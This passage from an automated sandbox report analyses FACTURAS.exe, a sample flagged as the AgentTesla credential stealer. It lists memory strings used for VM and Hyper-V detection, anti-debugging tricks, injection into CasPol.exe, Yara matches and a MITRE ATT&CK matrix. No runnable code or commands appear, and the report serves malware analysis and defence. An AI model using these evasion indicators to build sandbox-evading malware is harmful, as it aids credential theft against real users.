            Source: FACTURAS.exe, 00000001.00000002.21869632814.0000000003170000.00000004.00000001.sdmp, CasPol.exe, 00000006.00000002.22637930252.0000000001150000.00000004.00000001.sdmpBinary or memory string: C:\Program Files\Qemu-ga\qemu-ga.exe
            Source: FACTURAS.exe, 00000001.00000002.21869694639.0000000003239000.00000004.00000001.sdmp, CasPol.exe, 00000006.00000002.22638624948.0000000002C99000.00000004.00000001.sdmpBinary or memory string: Hyper-V Data Exchange Service
            Source: FACTURAS.exe, 00000001.00000002.21869694639.0000000003239000.00000004.00000001.sdmp, CasPol.exe, 00000006.00000002.22638624948.0000000002C99000.00000004.00000001.sdmpBinary or memory string: Hyper-V Heartbeat Service
            Source: FACTURAS.exe, 00000001.00000002.21869694639.0000000003239000.00000004.00000001.sdmp, CasPol.exe, 00000006.00000002.22638624948.0000000002C99000.00000004.00000001.sdmpBinary or memory string: Hyper-V Guest Service Interface
            Source: CasPol.exe, 00000006.00000002.22638624948.0000000002C99000.00000004.00000001.sdmpBinary or memory string: vmicheartbeat
            Source: FACTURAS.exe, 00000001.00000002.21869632814.0000000003170000.00000004.00000001.sdmpBinary or memory string: ntdllkernel32user32C:\Program Files\Qemu-ga\qemu-ga.exeC:\Program Files\qga\qga.exepsapi.dllMsi.dllPublisherwininet.dllMozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Geckoshell32advapi32APPDATA=windir=\Microsoft.NET\Framework\v4.0.30319\caspol.exe\syswow64\msvbvm60.dllwindir=\Microsoft.NET\Framework\v4.0.30319\caspol.exe\syswow64\msvbvm60.dll

            Anti Debugging:

            barindex
            Hides threads from debuggersShow sources
            Source: C:\Users\user\Desktop\FACTURAS.exeThread information set: HideFromDebugger
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeThread information set: HideFromDebugger
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess token adjusted: Debug
            Source: C:\Users\user\Desktop\FACTURAS.exeProcess queried: DebugPort
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess queried: DebugPort
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeMemory allocated: page read and write | page guard

            HIPS / PFW / Operating System Protection Evasion:

            barindex
            Writes to foreign memory regionsShow sources
            Source: C:\Users\user\Desktop\FACTURAS.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe base: E10000
            Source: C:\Users\user\Desktop\FACTURAS.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe "C:\Users\user\Desktop\FACTURAS.exe"
            Source: C:\Users\user\Desktop\FACTURAS.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe "C:\Users\user\Desktop\FACTURAS.exe"
            Source: CasPol.exe, 00000006.00000002.22638238010.0000000001840000.00000002.00020000.sdmpBinary or memory string: Shell_TrayWnd
            Source: CasPol.exe, 00000006.00000002.22638238010.0000000001840000.00000002.00020000.sdmpBinary or memory string: Program Manager]\
            Source: CasPol.exe, 00000006.00000002.22638238010.0000000001840000.00000002.00020000.sdmpBinary or memory string: Progman
            Source: CasPol.exe, 00000006.00000002.22638238010.0000000001840000.00000002.00020000.sdmpBinary or memory string: Progmanlock
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeQueries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe VolumeInformation
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
            Source: CasPol.exe, 00000006.00000002.22646307055.000000001DF31000.00000004.00000001.sdmpBinary or memory string: MsMpEng.exe

            Stealing of Sensitive Information:

            barindex
            Yara detected AgentTeslaShow sources
            Source: Yara matchFile source: 00000006.00000002.22646307055.000000001DF31000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: CasPol.exe PID: 5196, type: MEMORYSTR
            Source: Yara matchFile source: 00000006.00000002.22646307055.000000001DF31000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: CasPol.exe PID: 5196, type: MEMORYSTR

            Remote Access Functionality:

            barindex
            Yara detected AgentTeslaShow sources
            Source: Yara matchFile source: 00000006.00000002.22646307055.000000001DF31000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: CasPol.exe PID: 5196, type: MEMORYSTR

            Mitre Att&ck Matrix

            Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
            Valid AccountsWindows Management Instrumentation211DLL Side-Loading1Process Injection112Masquerading1OS Credential DumpingSecurity Software Discovery431Remote ServicesArchive Collected Data1Exfiltration Over Other Network MediumEncrypted Channel11Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
            Default AccountsScheduled Task/JobBoot or Logon Initialization ScriptsDLL Side-Loading1Disable or Modify Tools1LSASS MemoryProcess Discovery2Remote Desktop ProtocolData from Removable MediaExfiltration Over BluetoothIngress Tool Transfer1Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
            Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)Virtualization/Sandbox Evasion341Security Account ManagerVirtualization/Sandbox Evasion341SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationNon-Application Layer Protocol2Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
            Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Process Injection112NTDSApplication Window Discovery1Distributed Component Object ModelInput CaptureScheduled TransferApplication Layer Protocol113SIM Card SwapCarrier Billing Fraud
            Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptObfuscated Files or Information1LSA SecretsSystem Information Discovery114SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
            Replication Through Removable MediaLaunchdRc.commonRc.commonDLL Side-Loading1Cached Domain CredentialsSystem Owner/User DiscoveryVNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features

            Behavior Graph

            Hide Legend

            Legend:

            • Process
            • Signature
            • Created File
            • DNS/IP Info
            • Is Dropped
            • Is Windows Process
            • Number of created Registry Values
            • Number of created Files